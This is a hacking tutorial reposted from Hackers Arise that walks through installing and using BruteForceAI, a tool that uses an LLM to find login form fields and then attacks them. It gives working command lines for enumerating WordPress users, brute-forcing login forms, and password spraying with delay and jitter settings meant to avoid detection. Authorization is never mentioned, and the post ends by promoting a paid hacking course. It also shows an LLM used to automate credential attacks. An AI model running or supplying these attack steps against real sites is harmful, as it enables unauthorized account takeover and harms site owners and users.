National Cyber Warfare Foundation (NCWF)

Nowadays, security engineers make an effort to get people to use complex passwords, and 2FA is becoming required on more and more platforms. This makes password cracking more time-consuming and sometimes only a first step toward access, but it can still be the hacker’s best entry point to an account or network. Today, I’d like […]

The post Automated Password Cracking with BruteForceAI first appeared on Hackers Arise.

Today, I’d like to talk about a tool that simplifies password cracking by combining features of tools for automated credentials attacks and Large Language Models (LLMs) – BruteForceAI.

BruteForceAI is a tool that automatically identifies login form selectors using AI and then conducts a brute force or password spraying attack in a human-like way.

Step #1: Install BruteForceAI

To get started, we need to clone the repository from GitHub:
kali> git clone https://github.com/MorDavid/BruteForceAI.git
kali> cd BruteForceAI

BruteForceAI required Python 3.8 or higher. Consider checking the version before continuing:
kali> python –version

In my case, it’s 3.13.5, and now I’m ready to install dependencies:
kali> pip3 install -r requirements.txt

I’ve used the –break-system-packages flag to ignore the environment error. You can use this command or create a virtual Python environment for this project.

Besides that, I’ve got an error about sqlite3 version. To fix that, we can install SQLite dev headers:
kali> sudo apt install libsqlite3-dev

For working with browser automation, BruteForceAI uses the Playwright library. We can install it using NPM:

kali> npm install playwright

To work correctly, a playwright needs a rendering engine; in this case, I’ll use Chromium:

kali> npx playwright install chromium

In the command above, you can see npx. It’s a command-line tool that comes with npm. It temporarily downloads and runs a program directly without adding it permanently to your system.

Step #2: AI Engine Setup

You have two options for the AI analysis engine: local or cloud AI. I have pretty humble hardware for running even small LLMs locally; therefore, I’ll show you how to use the cloud AI option.

There is a platform called Groq that provides access to different LLM models in the cloud through its API. To get started, you just need to sign up and acquire an API key.

Step #3: Prepare Target Lists

First of all, we need to create a file targets.txt and list URLs that contain a login form. In my case, it’ll be a WordPress website.

Before starting to crack, we need to figure out the registered users. For this, I’ve used WPScan and successfully saved all users to the file users.txt. To learn more about WPScan, check this article.

Step #4: Reconnaissance

Before launching attacks, BruteForceAI needs to analyze your targets and understand their login mechanisms.

kali> python3 BruteForceAI.py analyze –urls targets.txt –llm-provider groq –llm-model llama-3.3-70b-versatile –llm-api-key YOUR_KEY

The AI will analyze the target, identify form elements, and store the intelligence in a SQLite database.

Step #5: Online Password Cracking

We’re ready to execute a standard brute-force attack using AI-discovered selectors.

An important aspect that I didn’t mention is the password list. In this case, I’ll be using the 500 worst passwords from Seclists.

kali> python BruteForceAI.py attack –urls targets.txt –usernames users.txt –passwords /usr/share/seclists/Passwords/500-worst-passwords.txt –threads 10

I’ve mentioned –thread 10 flag, which means the script will run 10 parallel threads (simultaneous tasks) during the attack. But nowadays, such brute force will be quickly indefinable, so let’s see how we can conduct password spraying using BruteForceAI.

kali> python BruteForceAI.py attack –urls targets.txt –usernames users.txt –passwords /usr/share/seclists/Passwords/500-worst-passwords.txt –mode passwordspray –threads 15 –delay 10 –jitter 3 –success-exit

Where:

–mode passwordspray — Uses password spraying mode (tries one password across many accounts before moving to the next password).
–delay 10 — Waits 10 seconds between attempts per thread.
–jitter 3 — Adds up to 3 seconds of random extra delay to avoid detection.
–success-exit — Stops running immediately if a successful login is found.

BruteForceAI will continue from passwords that weren’t checked during the brute-force attack and start spraying.

To make it more stealthy, we can add a custom User-Agent, play with delays, and decrease the threads. And eventually this script will run until it checks all passwords or until it finds the correct one.

Summary

BruteForceAI is a great tool that makes password attacks much simpler. In this article, we discovered how to install BruteForceAI, get ready for use, conduct reconnaissance, and start attacking passwords. By combining this with different LLMs, this tool can make passwords attack faster and more efficient. But in any case, the success of this kind of attack depends on how good a password list you have, so consider checking tools like crunch and cupp.

If you want to improve your password-cracking skills and cybersecurity in general, check out our Master Hacker Bundle. You’ll dive deep into essential skills and techniques like reconnaissance, password cracking, vulnerability scanning, Metasploit 5, antivirus evasion, Python scripting, social engineering, and more.